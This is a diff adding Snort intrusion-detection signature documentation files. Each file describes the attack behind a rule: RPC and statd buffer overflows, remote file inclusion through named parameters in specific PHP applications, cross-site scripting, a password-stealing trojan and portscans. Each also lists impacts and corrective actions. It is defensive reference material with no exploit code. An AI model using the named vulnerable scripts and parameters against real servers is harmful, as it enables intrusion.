+--
+Sid:
+3426
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1124.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1124
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1354.txt
@@ -0,0 +1,47 @@
+Rule:
+
+--
+Sid:
+1354
+
+--
+Summary:
+Attempted nasm command access via web. 
+
+--
+Impact:
+Attempt to compile a binary on a host.
+
+--
+Detailed Information:
+This is an attempt to compiile a program source on a host. NASM is the Netwide Assembler which is capable of compiling a variety of sources on a variety of platforms into executable binary files. The attacker could possibly compile a program needed for other attacks on the system or install a binary program of his choosing.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains 'nasm' in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. This command may also be requested on a command line should the attacker gain access to the machine. Whenever possible, sensitive files and certain areas of the filesystem should have the system immutable flag set to prevent files from being added to the host. On BSD derived systems, setting the systems runtime securelevel also prevents the securelevel from being changed. (note: the securelevel can only be increased).
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1353
+
+--
--- /dev/null
+++ b/doc/signatures/2113.txt
@@ -0,0 +1,51 @@
+Rule:
+
+--
+Sid:
+2113
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability in the rexec daemon.
+
+--
+Impact:
+Serious.  An attacker may gain escalated privileges offering super user access on the affected host.
+
+--
+Detailed Information:
+Rexec offers users the ability to execute commands on a host from remote locations.
+
+A vulnerability exists such that an when an overly long username is supplied to the rexec daemon, a buffer overflow condition may occur thus presenting the attacker with the opportunity to execute arbitrary code and possibly gain escalated privileges on the target host.
+
+--
+Attack Scenarios:
+Simple.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Disallow the use of rexec commands from sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1265.txt
@@ -0,0 +1,60 @@
+Rule:
+
+Sid:
+1265
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) cmsd is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port cmsd is using.  Attackers can also learn what versions of the cmsd protocol are accepted by cmsd.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as cmsd run.  The cmsd RPC service implements the Calendar Manager Service daemon that is often distributed with the Common Desktop Environment (CDE) and OpenWindows.  Several buffer overflow vulnerabilities have been associated with cmsd.
+
+--
+Affected Systems:
+Any host running the RPC service cmsd.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where cmsd runs.  This may be a precursor to accessing cmsd.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access cmsd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for cmsd, not probes of the cmsd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the cmsd service itself. An attacker may attempt to go directly to the cmsd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids 
+http://www.whitehats.com/info/IDS17
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000392.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000392
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "vacadm.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "vacadm.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/3103.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3103
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/121-2.txt
@@ -0,0 +1,98 @@
+
+
+Rule:
+
+--
+Sid:
+121-2
+
+--
+Summary:
+This event is generated when the pre-processor flow-portscan detects
+network traffic that may constitute an attack. Specifically a sliding
+scale scanner limit exceeded event was generated.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the flow-portscan pre-processor detects
+network traffic that may consititute an attack.
+
+The flow-portscan pre-processor uses a flow based technique to identify
+portscanning in one-to-many and many-to-one scenarios based on flow
+creation in the flow pre-processor.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.flow-portscan in the docs directory
+of the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+detailed instructions and examples on how to tune and use the
+pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Chris Green <cmg@snort.org>
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
--- /dev/null
+++ b/doc/signatures/100000661.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000661
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "MyPHP Guestbook" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "email" parameter in the "edit.php" script used 
+by the "MyPHP Guestbook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP Guestbook
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/1376.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1376
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2114.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2114
+
+--
+Summary:
+This event is generated when a remote attacker attempts to send a large number of null characters to port 512 on an internal server. This may indicate an attempt to exploit a buffer overflow condition in Pragma Systems TelnetServer 2000.
+
+--
+Impact:
+Denial of service by anonymous, remote users.
+
+--
+Detailed Information:
+Pragma Systems TelnetServer 2000 contains a vulnerability where a large number of null characters sent to the Telnet server's rexec port can crash the server. 
+
+--
+Affected Systems:
+Pragma Systems TelnetServer 2000
+
+--
+Attack Scenarios:
+A remote attacker can send messages that contain a large number of null characters to the Telnet server, causing the server to crash.
+
+--
+Ease of Attack:
+Simple. An exploit exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to TelnetServer 2000 build 2 or higher.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/1605
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0708
+
+--
--- /dev/null
+++ b/doc/signatures/1690.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1690
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000467.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+100000467
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "WebprojectDB" application running on a webserver. 
+Access to the file "nav.php" using a remote file being passed as the "INCDIR" 
+parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "INCDIR" parameter in the "nav.php" script used by the 
+"WebprojectDB" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using WebprojectDB
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/112-4.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+112-4
+
+--
+Summary:
+This event is generated when the pre-processor spp_arpspoof detects
+network traffic that may constitute an attack. Specifically an arp 
+cache overwrite attack was detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the spp_arpspoof pre-processor detects
+network traffic that may consititute an attack.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/916.txt
@@ -0,0 +1,62 @@
+SID:
+916
+--
+
+Rule:
+--
+
+Summary:
+This even indicates an attempt to exploit undocumented CFML tags on a 
+Allaire ColdFusion Server
+--
+
+Impact:
+Extensive server data retrieval including settings and passwords
+--
+
+Detailed Information:
+Undocumented CFML tags allow reading and decryption of sensitive data 
+contained on servers running Allaire ColdFusion Server 2.0 - 4.0.1. This
+data can be accesses by constructing a hosted application that accesses 
+these undocumented tags with the possibility of changing values on the 
+server and reading admin and studio passwords
+--
+
+Affected Systems:
+	Allaire ColdFusion Server 2.0 - 4.0.1
+--
+
+Attack Scenarios:
+A user with permission to create pages on the server installs an 
+application that accesses the undocumented CFML tags, accessing this 
+application would allow viewing and possible modifications of these 
+settings
+--
+
+Ease of Attack:
+Medium, Attackers need the ability to add files to the server. No "In 
+the Wild" exploits were available at type of writing
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Patches are available from Allaire, install them.
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
--- /dev/null
+++ b/doc/signatures/3150.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+3150
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+vulnerability in Microsoft Windows SQL Server.
+
+--
+Impact:
+Serious. Code execution is possible leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft Windows SQL Server 2000 uses the SQLXML component to process
+database queries via XML.
+
+Due to a programming error a buffer overrun condition is present in the
+SQLXML ISAPI component that processes the XML queries via HTTP. The
+overrun condition can be exploited by manipulating the contenttype
+variable used to control the Content-Type header. The ISAPI extension
+does not correctly check the length of the contenttype parameter. It may
+be possible for an attacker with user privileges on the target host to
+exploit the condition by supplying extra data in the affected parameter.
+
+--
+Affected Systems:
+	Microsoft SQL Server 2000
+
+--
+Attack Scenarios:
+An attacker can overflow a buffer by inserting extra data into the
+contenttype parameter of a malicious XML query. The attacker may then
+insert code of their choosing to either run commands on the system or
+execute the code with the privileges of the administrative account.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1891.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1891
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an
+unvalidated format string error associated the with Remote Procedure
+Call (RPC) statd.
+
+--
+Impact:
+Remote root access. If successful, this exploit allows execution of
+arbitrary commands as root.
+
+--
+Detailed Information:
+The statd RPC services implements a component of the Network File System
+(NFS) known as the Network Status and Monitor protocol.  A vulnerability
+exists due to improper format string checking that allows arbitrary code
+to be executed with the privileges of statd, usually root.
+
+--
+Affected Systems:
+	Conectiva Linux 4.0, 4.0, 4.1, 4.2, 5.0, 5.1
+	Debian Linux 2.2, 2.3
+	RedHat Linux 6.0, 6.1, 6.2
+	RedHat nfs-utils-0.1.6-2.i386.rpm + RedHat Linux 6.2
+	SuSE Linux 6.3, 6.4, 7.0
+	Trustix Secure Linux 1.0, 1.1
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where statd
+runs and send the exploit to the statd port. If the portmapper port is
+blocked, the attacker may send the exploit to any listening port in the
+range associated with RPC services.
+
+--
+Ease of Attack:
+Simple. Exploit code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2286.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+2286
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Unauthorized electronic mail relaying.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to access the script
+friends.php included in the PHP application vbPortal. This may indicate
+an attempt to use the server as an email relay.
+
+--
+Affected Systems:
+	All systems running the PHP application vbPortal
+
+--
+Attack Scenarios:
+The attacker could access the friends.php script directly to send spam
+email to thousands of recipients using the server as a relay.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/118.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+118
+
+--
+Summary:
+Satans Backdoor is a Trojan Horse capable of stealing passwords. This 
+event is generated when an infected machine replies to the attackers 
+connection attempt.
+
+--
+Impact:
+Possible theft of data and passwords.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	
+The Trojan server always communcates via port 666 and cannot be changed 
+by the attacker. The server portion itself is named winvmm32.exe, this 
+also cannot be changed. The main purpose of this Trojan is password 
+stealing thus presenting the attacker with access to other machines and 
+possible further compromise of data.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+The Trojan server is located called winvmm32.exe.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Delete the file winvmm32.exe.
+
+Kill the process winvmm32.exe.
+
+--
+Contributors:
+Orignal rule by  webmaster@tlsecurity.net
+
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS316
+
+--
--- /dev/null
+++ b/doc/signatures/100000786.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000786
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "ATutor" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "cat" parameter in the "browse.php" script used by the "ATutor" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using ATutor
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000479.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+100000479
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "CzarNews" application running on a webserver. 
+Access to the file "headlines.php" using a remote file being passed as the 
+"tpath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "tpath" parameter in the "headlines.php" script used by 
+the "CzarNews" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using CzarNews
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
